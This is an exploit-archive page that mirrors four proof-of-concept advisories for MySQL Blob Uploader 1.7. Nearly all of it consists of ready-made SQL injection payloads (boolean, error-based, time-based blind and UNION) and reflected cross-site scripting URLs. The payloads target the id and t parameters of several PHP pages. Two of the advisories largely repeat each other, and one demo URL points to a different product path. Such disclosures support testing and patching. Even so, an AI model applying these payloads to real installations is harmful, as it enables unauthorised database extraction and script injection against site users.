MySQL Blob Uploader 1.7 Cross Site Scripting / SQL Injection
CVE
Category
Price
Severity
N/A
CWE-79
$1500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2018-05-24
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050199 Below is a copy:
MySQL Blob Uploader 1.7 Cross Site Scripting / SQL Injection -------------------------
Exploit 1 of 4:
# Exploit Title: MySQL Blob Uploader 1.7 - 'download.php' SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 - seventh update
# Category: Webapps
# Tested on: Kali linux
====================================================
# PoC : SQLi :
Parameter : id
Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44' AND 4775=4775 AND 'yvnT'='yvnT&t=files
Type : error-based
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44' AND (SELECT 7995 FROM(SELECT
COUNT(*),CONCAT(0x71766b7071,(SELECT
(ELT(7995=7995,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VOHb'='VOHb&t=files
Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44' AND SLEEP(5) AND 'GnhY'='GnhY&t=files
Type : UNION query
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=-9508' UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x6267544b5552795353544744426577526b47544d477553476d576442544152546e4a456b586c726d,0x71786b7671),NULL--
wxis&t=files
Parameter : t
Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 6575=6575 AND 6608=6608#
Type : error-based
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 5293=5293 AND (SELECT 1625 FROM(SELECT
COUNT(*),CONCAT(0x71766b7071,(SELECT
(ELT(1625=1625,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OpVv
Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 6736=6736 AND (SELECT * FROM
(SELECT(SLEEP(5)))GjCP)-- UaZE
====================================================
# PoC : XSS :
Payload(1) :
http://test.com/MySqlBlobUploader/download.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files
Payload(2) :
http://test.com/MySqlBlobUploader/download.php?id=44&t=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;
-------------------------
Exploit 2 of 4:
# Exploit Title: MySQL Blob Uploader 1.7 - 'home-file-edit.php' SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 - seventh update
# Category: Webapps
# Tested on: Kali linux
====================================================
# PoC : SQLi :
Parameter : id
Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42' AND 5445=5445 AND 'xkCg'='xkCg
Type : error-based
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42' AND (SELECT 8740 FROM(SELECT
COUNT(*),CONCAT(0x7178717671,(SELECT
(ELT(8740=8740,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xWJA'='xWJA
Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42' AND SLEEP(5) AND 'eOfO'='eOfO
Type : UNION query
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=-4824' UNION ALL SELECT
CONCAT(0x7178717671,0x4e4448494b6a6457474572704c5a73534661474c6f6b44554a7863754d77565570654c664a634274,0x717a6b7171),NULL,NULL,NULL,NULL,NULL--
aTGd
====================================================
# PoC : XSS :
Payload :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files
-------------------------
Exploit 3 of 4:
# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 - seventh update
# Category: Webapps
# Tested on: Kali linux
====================================================
# PoC : SQLi :
Parameter : id
Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7' AND 3132=3132 AND 'erLO'='erLO
Type : error-based
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7' AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj
Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7' AND SLEEP(5) AND 'MvuE'='MvuE
Type : UNION query
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=-3399' UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL--
EcgK
====================================================
# PoC : XSS :
Payload :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;
-------------------------
Exploit 4 of 4:
# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 - seventh update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:
id=7' AND 3132=3132 AND 'erLO'='erLO
# Type: error-based
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:
id=7' AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj
# Type: AND/OR time-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:
id=7' AND SLEEP(5) AND 'MvuE'='MvuE
# Type: UNION query
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:
id=-3399' UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL--
EcgK
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum